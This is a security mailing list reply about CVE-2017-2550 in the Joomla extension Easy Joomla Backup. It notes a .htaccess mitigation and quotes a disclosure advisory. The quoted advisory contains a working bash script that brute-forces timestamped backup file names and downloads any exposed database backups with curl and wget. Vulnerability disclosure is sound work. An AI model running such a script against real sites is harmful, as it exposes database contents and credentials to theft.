Openwall GNU/*/Linux - a small security-enhanced Linux distro for servers
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Date: Thu, 28 Sep 2017 15:09:11 +0200
From: David Jardin <david.jardin@...munity.joomla.org>
To: oss-security@...ts.openwall.com
Subject: Re: Joomla extension Easy Joomla Backup v3.2.4
 database backup exposure

It’s worth to mention that the extension has a default .htaccess file with a „deny from all“ in the backup directory, that will mitigate the described attack on pretty much any standard shared-hosting platform that I’m aware of.




Am 28. September 2017 um 14:37:20, Larry W. Cashdollar (larry0@...com) schrieb:

Title: Joomla extension Easy Joomla Backup v3.2.4 database backup exposure  
Author: Larry W. Cashdollar, @_larry0  
Date: 2017-09-07  
CVE-ID:[CVE-2017-2550]  
Download Site: https://joomla-extensions.kubik-rubik.de/ejb-easy-joomla-backup  
Vendor: kubik-rubik  
Vendor Notified: 2017-09-07  
Vendor Contact:  
Advisory: http://www.vapidlabs.com/advisory.php?v=200  
Description: Easy Joomla Backup creates 'old-school' backups without any frills.  
Vulnerability:  
The software creates a copy of the backup in the web root. The file name is easily guessable as it's just a time stamp:  

http://example.com/administrator/components/com_easyjoomlabackup/backups/DOMAIN_YEAR-MONTH-DAY_H-M-S.zip  

Exploit Code:  
• #!/bin/bash  
• #Larry W. Cashdollar, @_larry0 9/7/2017  
• #Bruteforce download backups for Joomla Extension Easy Joomla Backup v3.2.4  
• #https://joomla-extensions.kubik-rubik.de/ejb-easy-joomla-backup  
• MONTH=09  
• DAY=07  
• YEAR=2017  
• Z=0  
• #May need to set the DOMAIN to $1 the target depending on how WP is configured.  
• DOMAIN=192.168.0.163  
•  
• echo "Scanning website for available backups:"  
• for y in `seq -w 0 23`; do  
• for x in `seq -w 0 59`; do  
• Y=`echo "scale=2;($Z/86000)*100"|bc`;  
• echo -ne "\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b$CPATH $Y%"  
• for z in `seq -w 0 59`; do  
• Z=$(( $Z + 1 ));  
• CPATH="http://$1/administrator/components/com_easyjoomlabackup/backups/"$DOMAIN"_"$YEAR"-"$MONTH"-"$DAY"_"$y"-"$x"-"$z".zip";  
• RESULT=`curl -s --head $CPATH|grep 200`;  
• if [ -n "$RESULT" ]; then  
• echo ""  
• echo "[+] Location $CPATH Found";  
• echo "[+] Received $RESULT";  
• echo "Downloading......";  
• wget $CPATH  
• fi;  
• done  
• done  
• done  
• echo "Completed."
-- 
Kind Regards,
David Jardin
[ CONTENT OF TYPE text/html SKIPPED ]

[ CONTENT OF TYPE application/pgp-signature SKIPPED ]

Powered by blists - more mailing lists

Your e-mail address:

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Powered by Openwall GNU/*/Linux - Powered by OpenVZ